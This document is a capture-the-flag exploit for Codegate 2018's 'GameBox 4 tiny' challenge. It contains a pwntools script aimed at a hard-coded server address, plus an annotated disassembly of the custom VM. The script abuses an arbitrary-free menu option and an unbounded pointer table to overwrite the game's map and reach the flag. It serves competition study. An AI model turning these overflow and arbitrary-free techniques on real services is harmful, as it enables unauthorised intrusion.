EXP for Codegate 2018 Final _GameBox 4 tiny
#!/usr/bin/env python
# encoding: utf-8
"""Exploit for Codegate 2018 Final "GameBox 4 tiny" (a small custom-VM game).

Python 2 + pwntools script (it uses the ``print`` statement).  Outline, as
read from the VM disassembly that follows the script:

1. solve the SHA-1 proof-of-work the server hands out;
2. "sell" six fixed addresses (0x100000 .. 0x150000): the VM's sell routine
   frees whatever value the client supplies as long as it is >= 0x100000;
3. raise 257 dogs -- the dog-pointer table has 256 slots and no bound
   check, so the 257th pointer is written over the map pointer (struct
   offset 771) and the up-to-4096-byte "name" read then fills the map
   with attacker-chosen tiles;
4. walk over 300 '*' power-ups (atk 97 -> 1597) and onto a 'z' boss tile,
   which calls the win routine (prints a file, exits) once atk >= 700.
"""
from pwn import *  # provides remote(), process(), context
r = remote("58.229.240.150", 8888)  # hard-coded CTF target; a local `process()` variant is commented out below
context.log_level = 'debug'  # hexdumps all traffic, including the 3600-byte map payload
import random  # unused: the random-suffix PoW variant is commented out below
from hashlib import sha1
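r.recvuntil("prefix : ")
prefix = r.recv(6)
print(prefix)  # works as a statement on Python 2 and as a call on Python 3


def solve_pow(prefix, suffix="000000"):
    """Brute-force the service's proof-of-work.

    The server sends a 6-byte ``prefix``; it accepts ``prefix + <decimal
    counter>`` once ``sha1(answer).hexdigest()`` ends in ``suffix``.  With
    the challenge's six-nibble suffix that is about 2**24 SHA-1 calls on
    average, i.e. a noticeable wait in pure Python.

    Args:
        prefix: bytes received from the server (``str`` on Python 2,
            ``bytes`` on Python 3; a text ``str`` on Python 3 also works).
        suffix: required hex-digest tail; ``'000000'`` for this challenge.

    Returns:
        The first matching answer, of the same type as ``prefix``.  The
        search is unbounded and only returns once a match is found.
    """
    counter = 0
    while True:
        counter += 1
        tail = str(counter)
        if isinstance(prefix, bytes):
            # bytes + str raises on Python 3; the counter is pure ASCII.
            tail = tail.encode("ascii")
        candidate = prefix + tail
        digest_input = candidate if isinstance(candidate, bytes) else candidate.encode("ascii")
        if sha1(digest_input).hexdigest().endswith(suffix):
            return candidate


answer = solve_pow(prefix)
r.sendline(answer)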
# r = process("./vm_tiny.py")
def buy(avatar, data=1):
    """Menu option 2 ("raise a dog"): make the server allocate a dog buffer.

    Every call makes the VM allocate a buffer and append its pointer to the
    dog table (there is no bound check on the count server-side).  With
    ``data == 0`` the name prompt is declined and ``avatar`` is never sent;
    otherwise ``avatar`` is sent as the name, of which the VM reads up to
    4096 bytes straight into the new buffer.
    """
    r.sendlineafter(">", "2")
    if data != 0:
        r.sendlineafter(">", "y")
        r.sendline(avatar)
        r.recvuntil("new dog")
    else:
        r.sendlineafter(">", "n")
def sell(index):
    """Menu option 3 ("sell a dog") -- really an arbitrary-free primitive.

    Despite the prompt, the VM never looks ``index`` up in the dog table: it
    reads 4 bytes, takes the first 3 as a 21-bit value and, if that value is
    at least 0x100000, passes it straight to free().  ``index`` should be an
    address encoded with ``p()``.  The game accepts only six sells.
    """
    for prompt, reply in ((">", "3"), ("which dog do you want to sell?\n>", index)):
        r.sendlineafter(prompt, reply)
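def p(i):
    """Encode ``i`` as a 3-character "tri" value in the game's wire order.

    The exploit packs 7 bits per character (21 bits total) in the order
    low 7 bits, then the top 7 bits, then the middle 7 bits -- i.e. *not*
    plain little-endian.  This is presumably the VM's ``tri`` word format
    (confirm against the VM source); ``sell()`` sends the result as the
    address to free.

    Args:
        i: integer in ``[0, 2**21)``.

    Returns:
        A 3-character str; every char is < 0x80, so it is safe as ASCII.

    Raises:
        ValueError: if ``i`` does not fit in 21 bits.  The original code
            silently masked the value, which yields the wrong address.
    """
    if not 0 <= i < (1 << 21):
        raise ValueError("tri value out of range (need 0 <= i < 2**21): %r" % (i,))
    low = i & 0x7F
    mid = (i >> 7) & 0x7F
    high = (i >> 14) & 0x7F
    return chr(low) + chr(high) + chr(mid)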
# Step 1: six frees of fixed addresses through the "sell" menu.  sell_a_dog
# only requires the value to be >= 0x100000 and never consults the dog
# table; struct offset 774 holds a budget of exactly 6 sells, all used here.
# Why these particular addresses help depends on the VM's allocator, which
# is not part of this gist.
for target in range(0x100000, 0x160000, 0x10000):
    sell(p(target))

# Step 2: 256 dogs without a name.  Each raise_a_dog call allocates a buffer
# and stores its pointer at r10 + 3*count with no bound check on count.
# The name argument is never sent when the prompt is declined.
for _ in range(256):
    buy("", 0)

# Step 3: dog #257.  Its pointer goes to r10 + 3*257 = 771, on top of the
# map pointer, so the up-to-4096-byte name read fills what the game now
# treats as the 60x60 map: '@' (player at 0,0), 300 '*' power-ups
# (+40 hp / +5 atk each: 97 + 300*5 = 1597 >= the boss threshold of 700),
# and 'z' (boss) everywhere else.
fake_map = "@" + "*" * 300
fake_map = fake_map.ljust(3600, "z")
buy(fake_map, 1)

# Step 4: collect the power-ups.  Indentation here is reconstructed from the
# whitespace-stripped gist: 60 'd' moves sweep one row (the disassembly shows
# "r8 = 60" after r8++, presumably a modulo, so 60 steps return to column 0),
# then one 's' drops to the next row.  Row 0 holds 59 stars, rows 1-4 hold
# 240, and the fifth 's' lands on row 5 column 0 -- the 300th star.  The
# extra 's' then steps onto the first 'z', which runs the win routine
# (prints a file and exits) because atk >= 700.
for row in range(5):
    for step in range(60):
        r.sendlineafter(">", "d")
    r.sendlineafter(">", "s")
r.sendlineafter(">", "s")
r.sendlineafter(">", "1")
r.interactive()
// VM entry point: allocate the game struct, run main(), exit.
// Convention used by every call site below: r0 = syscall number,
// r1..r3 = arguments (see the syscall table at the end of the gist).
0: sp -= 3 // 3-byte ("tri") stack slot that receives the allocation address
5: r2 = 6 // same value init_struct / raise_a_dog pass; presumably the "perm" argument
10: r1 = sp
12: r0 = 4 // sys 4 = malloc(r1 = out-pointer, r2)
17: syscall
19: r10 = tri*(r1) // r10 = game struct base for the whole program (field layout at the end of the gist)
21: call 30 // main()
26: r0 ^= r0
28: syscall // sys 0 = exit(0)
main(): // banner, init, then the menu loop until hp reaches 0
30: push bp
32: bp = sp
34: sp -= 6
39: r0 = 1762
44: call puts // string at 1762 (banner, presumably)
49: call 259 // init struct && map
// menu loop; 431 returns 0 once get_hp() is 0
54: call 431 // if hp > 0
59: cmp r0 0
64: je(==) 253 // ret
69: r0 = 2729
74: call puts // menu prompt at 2729
79: r5 = bp
81: r5 -= 6
86: tri*(r5) = zero // clear the 3-byte input slot first
88: r1 = 3
93: r0 = r5
95: call read_syscall // read 3 to ebp-6
100: r6 ^= r6
102: r5 = bp
104: r5 -= 6
109: low(r6) = low*(r5) // only the first byte read is dispatched on
111: cmp low(r6) low(49) // '1'
116: jne(!=) 131
121: call 486 // show map
126: jmp 248
131: cmp low(r6) low(50) // '2'
136: jne(!=) 151
141: call 604
146: jmp 248 // raise a dog
151: cmp low(r6) low(51) // '3'
156: jne(!=) 171
161: call 772 // sell a dog
166: jmp 248
171: cmp low(r6) low(52) // '4'
176: jne(!=) 196
181: r0 = 2295
186: call puts // option 4 only prints the string at 2295
191: jmp 248
196: cmp low(r6) low(119) // 'w'
201: je(==) 241
206: cmp low(r6) low(97) // 'a'
211: je(==) 241
216: cmp low(r6) low(115) // 's'
221: je(==) 241
226: cmp low(r6) low(100) // 'd'
231: je(==) 241
236: jmp 248 // any other byte: silently back to the loop
241: r0 = r6
243: call 899 // move(r0 = direction char)
248: jmp 54
253: sp = bp
255: pop bp
257: pop pc
init_struct && map(): // fills the r10 struct, allocates the map and loads it from a file; returns r0 = map
259: push bp
261: bp = sp
263: sp -= 6
268: r5 = r10
270: tri*(r5) = zero // [r10+0] = dog count = 0
272: r5 = r10
274: r5 += 3
279: r2 = 256
284: r2 *= 3
289: r1 = 0
294: r0 = r5
296: call memset // [r10+3 .. r10+770] = 256 three-byte dog-pointer slots, zeroed
301: r5 = r10
303: r5 += 774
308: r6 = 6
313: tri*(r5) = r6 // [r10+774] = 6 = sells remaining (decremented by sell_a_dog)
315: r5 = r10
317: r5 += 777
322: r6 = 120
327: tri*(r5) = r6 // [r10+777] = hp = 120
329: r5 = r10
331: r5 += 780
336: r6 = 97
341: tri*(r5) = r6 // [r10+780] = 97 ('a'); "atk" below -- name inferred from its use in 899
343: r5 = r10
345: r5 += 783
350: tri*(r5) = zero // [r10+783] = player x = 0
352: r5 = r10
354: r5 += 786
359: tri*(r5) = zero // [r10+786] = player y = 0
361: r2 = 6
366: r5 = bp
368: r5 -= 6
373: r1 = r5
375: r0 = 4
380: syscall // malloc: map buffer address written to bp-6
382: r7 = tri*(r1)
384: r5 = r10
386: r5 += 771
391: tri*(r5) = r7 // [r10+771] = map pointer -- exactly the slot dog #257 is written to (3 * 257 = 771)
393: r5 = 3711
398: r1 = r5
400: r0 = 1
405: syscall // sys 1 = open(filename at 3711) -> r0 = fd
407: r3 = 3600
412: r2 = r7
414: r1 = r0
416: r0 = 3
421: syscall // sys 3 = read(fd, map, 3600): the 60 x 60 map comes from that file
423: r0 = r2 // return the map address
425: sp = bp
427: pop bp
429: pop pc
if hp > 0: // 431: returns r0 = 1 while hp > 0, else prints a message and returns 0 (ends main's loop)
431: push bp
433: bp = sp
435: sp -= 6
440: call get_hp
445: cmp r0 0
450: jb(>) 475 // hp > 0 -> return 1 (hp is clamped at 0 in 899, so it is never negative)
455: r0 = 3174
460: call puts // string at 3174 (game over, presumably)
465: r0 = 0
470: jmp 480
475: r0 = 1
480: sp = bp
482: pop bp
484: pop pc
print_map(): // menu option 1: writes the 60 rows of the map buffer, raw
486: push bp
488: bp = sp
490: sp -= 3
495: r0 = 2501
500: call puts // header string at 2501
505: r0 = 2924
510: call puts // string at 2924, printed again after the rows (border line, presumably)
515: call get_map
520: r7 = r0 // r7 = current row pointer
522: r6 ^= r6 // r6 = row counter
524: cmp r6 60
529: je(==) 588 // 60 rows
534: r1 = 1
539: r0 = 3040
544: call write_syscall // 1 byte from 3040 (left border, presumably)
549: r1 = 60
554: r0 = r7
556: call write_syscall // the 60-byte row, whatever bytes the buffer holds -- no filtering
561: r1 = 2
566: r0 = 3042
571: call write_syscall // 2 bytes from 3042 (right border + newline, presumably)
576: r7 += 60
581: r6++
583: jmp 524
588: r0 = 2924
593: call puts
598: sp = bp
600: pop bp
602: pop pc
raise_a_god(): // sic -- "raise a dog", menu option 2 (called from main at 141)
604: push bp
606: bp = sp
608: sp -= 6
613: r2 = 6
618: r5 = bp
620: r5 -= 3
625: r1 = r5
627: r0 = 4
632: syscall // malloc: new dog buffer address -> bp-3 (allocation size is not visible in this listing)
634: cmp r0 0
639: je(==) 756 // r0 == 0 after the syscall is treated as failure -> message at 3141
644: r5 = r10
646: r6 = tri*(r5)
648: r6++
650: tri*(r5) = r6 // dog count++ -- no upper bound anywhere in this routine
652: r6 *= 3
657: r6 += r10
659: r5 = bp
661: r5 -= 3
666: r5 = tri*(r5)
668: tri*(r6) = r5 // [r10 + 3*count] = buffer. BUG: the table has 256 slots (3..770); count 257 writes offset 771 = the map pointer
670: r0 = 3047
675: call puts // prompt at 3047 (name it y/n)
680: r1 = 3
685: r5 = bp
687: r5 -= 6
692: r0 = r5
694: call read_syscall // 3-byte answer
699: r5 = bp
701: r5 -= 6
706: r6 ^= r6
708: low(r6) = low*(r5)
710: cmp low(r6) low(121) // 'y'
715: jne(!=) 741
720: r1 = 4096
725: r5 = bp
727: r5 -= 3
732: r6 = tri*(r5)
734: r0 = r6
736: call read_syscall // read up to 4096 bytes into the new buffer; after the 257th dog that buffer IS the map
741: r0 = 3096
746: call puts // "new dog" message (the exploit waits for it)
751: jmp 766
756: r0 = 3141
761: call puts
766: sp = bp
768: pop bp
770: pop pc
sell_a_dog(): // menu option 3: frees a user-supplied address (arbitrary free)
772: push bp
774: bp = sp
776: sp -= 6
781: r5 = r10
783: r5 += 774
788: r6 = tri*(r5)
790: cmp r6 0
795: je(==) 883 // sell budget exhausted -> message at 3116
800: r6--
802: tri*(r5) = r6 // at most 6 sells per game
804: r0 = 2988
809: call puts // prompt at 2988 (the exploit waits for "which dog do you want to sell?")
814: r1 = 4 # TODO
819: r5 = bp
821: r5 -= 6
826: r0 = r5
828: call read_syscall // reads 4 bytes into bp-6; the exploit sends 3 chars + newline
833: r5 = bp
835: r5 -= 6
840: r6 = tri*(r5) // the first 3 bytes as a 21-bit value -- used as an address, not an index
842: cmp r6 1048576 // 0x100000
847: js(<) 883 // the ONLY validation: value >= 0x100000
852: r5 = bp
854: r5 -= 6
859: r1 = tri*(r5)
861: r0 = 6
866: syscall // sys 6 = free(user value); the dog table at r10+3.. is never consulted
868: r0 = 3021
873: call puts
878: jmp 893
883: r0 = 3116
888: call puts
893: sp = bp
895: pop bp
897: pop pc
// 899: move(r0 = direction char). Clears '@', moves x/y, draws '@' on the new tile
// and reacts to what was there: ' ' nothing, '*' power up, 'z' boss, 'a'..'y' monster.
899: push bp
901: bp = sp
903: sp -= 12 // bp-3: direction char, bp-6: scratch input, bp-9: map base, bp-12: &new tile
908: r5 = bp
910: r5 -= 3
915: low*(r5) = r0
917: call get_map
922: r5 = bp
924: r5 -= 9
929: tri*(r5) = r0
931: r5 = r10
933: r5 += 783
938: r8 = tri*(r5) // r8 = x
940: r5 = r10
942: r5 += 786
947: r9 = tri*(r5) // r9 = y
949: r5 = r0
951: r6 = r9
953: r6 *= 60
958: r5 += r6
960: r5 += r8 // r5 = &map[y*60 + x] (current tile)
962: r6 ^= r6
964: low(r6) = low*(r5)
966: cmp low(r6) low(64) // '@'
971: jne(!=) 983
976: r6 = 32
981: low*(r5) = r6 // erase the player marker: '@' -> ' '
983: r6 ^= r6
985: r5 = bp
987: r5 -= 3
992: low(r6) = low*(r5)
994: cmp low(r6) low(119) // 'w'
999: jne(!=) 1016
1004: r9--
1006: r9 = 60 // shown as "= 60" by the disassembler; presumably "%= 60" (wrap) -- the exploit relies on 60 steps returning to the same column
1011: jmp 1067
1016: cmp low(r6) low(97) // 'a'
1021: jne(!=) 1038
1026: r8--
1028: r8 = 60
1033: jmp 1067
1038: cmp low(r6) low(115) // 's'
1043: jne(!=) 1060
1048: r9++
1050: r9 = 60
1055: jmp 1067
1060: r8++ // 'd' (main only forwards w/a/s/d)
1062: r8 = 60
1067: r5 = r10
1069: r5 += 783
1074: tri*(r5) = r8
1076: r5 = r10
1078: r5 += 786
1083: tri*(r5) = r9 // store the new x / y
1085: r5 = bp
1087: r5 -= 9
1092: r5 = tri*(r5)
1094: r6 = r9
1096: r6 *= 60
1101: r5 += r6
1103: r5 += r8 // r5 = &map[new y*60 + new x]
1105: r6 = bp
1107: r6 -= 12
1112: tri*(r6) = r5 // saved at bp-12 for the monster / boss branches
1114: r6 ^= r6
1116: low(r6) = low*(r5) // r6 = tile stepped on
1118: r7 = 64
1123: low*(r5) = r7 // draw '@' there
1125: cmp low(r6) low(32) // ' ' -> nothing to do
1130: je(==) 1439
1135: cmp low(r6) low(42) // '*' -> power up
1140: je(==) 1285
1145: cmp low(r6) low(122) // 'z' -> boss
1150: je(==) 1332
1155: cmp low(r6) low(97)
1160: js(<) 1439 // below 'a': ignored
1165: cmp low(r6) low(122)
1170: jb(>) 1439 // above 'z': ignored
// 'a'..'y': a monster
1175: r0 = 2823
1180: call puts
1185: r1 = 3
1190: r5 = bp
1192: r5 -= 6
1197: r0 = r5
1199: call read_syscall // 3 bytes of input, not examined
1204: r5 = r10
1206: r5 += 777
1211: r7 = tri*(r5)
1213: cmp r7 30
1218: js(<) 1235
1223: r7 -= 30
1228: tri*(r5) = r7 // hp -= 30 ...
1230: jmp 1237
1235: tri*(r5) = zero // ... clamped at 0
1237: r5 = r10
1239: r5 += 780
1244: r7 = tri*(r5)
1246: cmp r6 r7
1248: jb(>) 1269 // monster letter > atk: monster stays (r6 is written back below)
1253: r5 = bp
1255: r5 -= 12
1260: r8 = tri*(r5)
1262: r6 = 42
1267: low*(r8) = r6 // monster beaten: tile becomes '*'
1269: r5 = bp
1271: r5 -= 12
1276: r8 = tri*(r5)
1278: low*(r8) = r6 // overwrites the '@' drawn at 1123 with r6 (monster letter or '*')
1280: jmp 1439
* (power up):
1285: r5 = r10
1287: r5 += 777
1292: r7 = tri*(r5)
1294: r7 += 40
1299: tri*(r5) = r7 // hp += 40
1301: r5 = r10
1303: r5 += 780
1308: r7 = tri*(r5)
1310: r7 += 5
1315: tri*(r5) = r7 // atk += 5, no cap: 121 power-ups take atk from 97 past the boss threshold of 700
1317: r0 = 2913
1322: call puts
1327: jmp 1439
boss:
1332: r0 = 2863
1337: call puts
1342: r1 = 3
1347: r5 = bp
1349: r5 -= 6
1354: r0 = r5
1356: call read_syscall // 3 bytes of input, not examined
1361: r5 = r10
1363: r5 += 777
1368: r7 = tri*(r5)
1370: cmp r7 2000
1375: js(<) 1392
1380: r7 -= 2000
1385: tri*(r5) = r7 // hp -= 2000 ...
1387: jmp 1394
1392: tri*(r5) = zero // ... clamped at 0 (hp is 0 after the boss unless it exceeded 2000)
1394: r5 = r10
1396: r5 += 780
1401: r7 = tri*(r5)
1403: cmp r7 700
1408: js(<) 1423
1413: call 1471 // atk >= 700: win routine (prints the file named at 3706, then exits)
1418: jmp 1439
1423: r5 = bp
1425: r5 -= 12
1430: r8 = tri*(r5)
1432: low*(r8) = r6 // atk < 700: the 'z' stays on the tile
1434: jmp 1439
1439: sp = bp
1441: pop bp
1443: pop pc
get_map // leaf routine (no frame): r0 = [r10+771], the map buffer pointer
1445: r5 = r10
1447: r5 += 771
1452: r6 = tri*(r5)
1454: r0 = r6
1456: pop pc
get_hp: // leaf routine (no frame): r0 = [r10+777], the hp value
1458: r5 = r10
1460: r5 += 777
1465: r6 = tri*(r5)
1467: r0 = r6
1469: pop pc
// 1471: win routine, reached only from the boss branch of 899 when atk >= 700
1471: push bp
1473: bp = sp
1475: sp -= 60
1480: r2 = 60
1485: r1 = 0
1490: r5 = bp
1492: r5 -= 60
1497: r0 = r5
1499: call memset // zero the 60-byte stack buffer
1504: r1 = 3706
1509: r0 = 1
1514: syscall // sys 1 = open(filename at 3706) -> r0 = fd; the flag file, presumably
1516: r3 = 60
1521: r5 = bp
1523: r5 -= 60
1528: r2 = r5
1530: r1 = r0
1532: r0 = 3
1537: syscall // sys 3 = read(fd, buf, 60)
1539: r5 = bp
1541: r5 -= 60
1546: r0 = r5
1548: call puts // prints the buffer up to its first NUL (puts uses strlen)
1553: r0 ^= r0
1555: syscall // sys 0 = exit(0): the epilogue below is never reached
1557: sp = bp
1559: pop bp
1561: pop pc
memset: // memset(r0 = dst, r1 = byte value, r2 = length), one byte per iteration; r0-r2 preserved
1563: push r0
1565: push r1
1567: push r2
1569: cmp r2 0
1574: je(==) 1590
1579: low*(r0) = r1
1581: r0++
1583: r2--
1585: jmp 1569
1590: pop r2
1592: pop r1
1594: pop r0
1596: pop pc
memcpy // memcpy(r0 = dst, r1 = src, r2 = length), byte-wise via r3; r0-r3 preserved. Not called anywhere in this listing
1598: push r0
1600: push r1
1602: push r2
1604: push r3
1606: cmp r2 0
1611: je(==) 1631
1616: low(r3) = low*(r1)
1618: low*(r0) = r3
1620: r0++
1622: r1++
1624: r2--
1626: jmp 1606
1631: pop r3
1633: pop r2
1635: pop r1
1637: pop r0
1639: pop pc
read_syscall: // read_syscall(r0 = buf, r1 = max length) -> sys 3 read(fd 0, buf, len); r0 is not restored, so it carries the syscall's result
1641: push r1
1643: push r2
1645: push r3
1647: r3 = r1 // size
1649: r2 = r0 // buffer
1651: r1 = 0 // fd 0 (stdin)
1656: r0 = 3
1661: syscall
1663: pop r3
1665: pop r2
1667: pop r1
1669: pop pc
write_syscall: // write_syscall(r0 = buf, r1 = length) -> sys 2 write(fd 1, buf, len); r0 is not restored
1671: push r1
1673: push r2
1675: push r3
1677: r3 = r1 // size
1679: r2 = r0 // buffer
1681: r1 = 1 // fd 1 (stdout)
1686: r0 = 2
1691: syscall
1693: pop r3
1695: pop r2
1697: pop r1
1699: pop pc
puts(): // puts(r0 = NUL-terminated string): write(1, s, strlen(s)). Unlike C puts, nothing here appends a newline
1701: push r0
1703: push r1
1705: r1 = r0
1707: call strlen // r0 = length
1712: exchange r1 r0 // r0 = string, r1 = length
1714: call write_syscall
1719: pop r1
1721: pop r0
1723: pop pc
strlen(): // strlen(r0 = string) -> r0 = number of bytes before the first 0 byte (r0 is advanced, then replaced by the count)
1725: push r1
1727: push r2
1729: r1 ^= r1 // r1 = count
1731: r2 ^= r2
1733: low(r2) = low*(r0)
1735: cmp low(r2) low(0)
1740: je(==) 1754
1745: r0++
1747: r1++
1749: jmp 1733
1754: r0 = r1
1756: pop r2
1758: pop r1
1760: pop pc
Game struct at r10 (3-byte "tri" fields), as initialised by init_struct (259):
0: 0 (count of dogs; incremented in raise_a_dog with no upper bound)
3-770: 0 (256 dog-pointer slots of 3 bytes each, zeroed by memset; dog #257 is written to offset 771)
771 : addr (map) -- overwritten by the 257th dog's buffer pointer, which is what the exploit relies on
774 : 6 (sells remaining; sell_a_dog refuses once it reaches 0)
777 : 120 (hp; -30 per monster, +40 per '*', -2000 at the boss, clamped at 0)
780 : 97 (attack; +5 per '*', compared against the monster letter and against 700 at the boss)
783 : 0 (player x, column within the 60-wide map)
786 : 0 (player y, row)
VM syscalls (number in r0; register usage as seen at the call sites above):
sys_s0: exit(0)
sys_s1: open(filename) -- r1 = address of the filename string; fd returned in r0
sys_s2: write(fd, buf, size) -- r1 = fd, r2 = buf, r3 = size
sys_s3: read(fd, buf, size) -- r1 = fd, r2 = buf, r3 = size
sys_s4: malloc(r1, perm) -- r1 = address of the tri slot that receives the allocation, r2 = perm (always 6 here); raise_a_dog treats r0 == 0 afterwards as failure
sys_s5: rand() -- not used anywhere in this listing
sys_s6: free(r1) -- r1 = address; its only caller is sell_a_dog, which takes the value straight from user input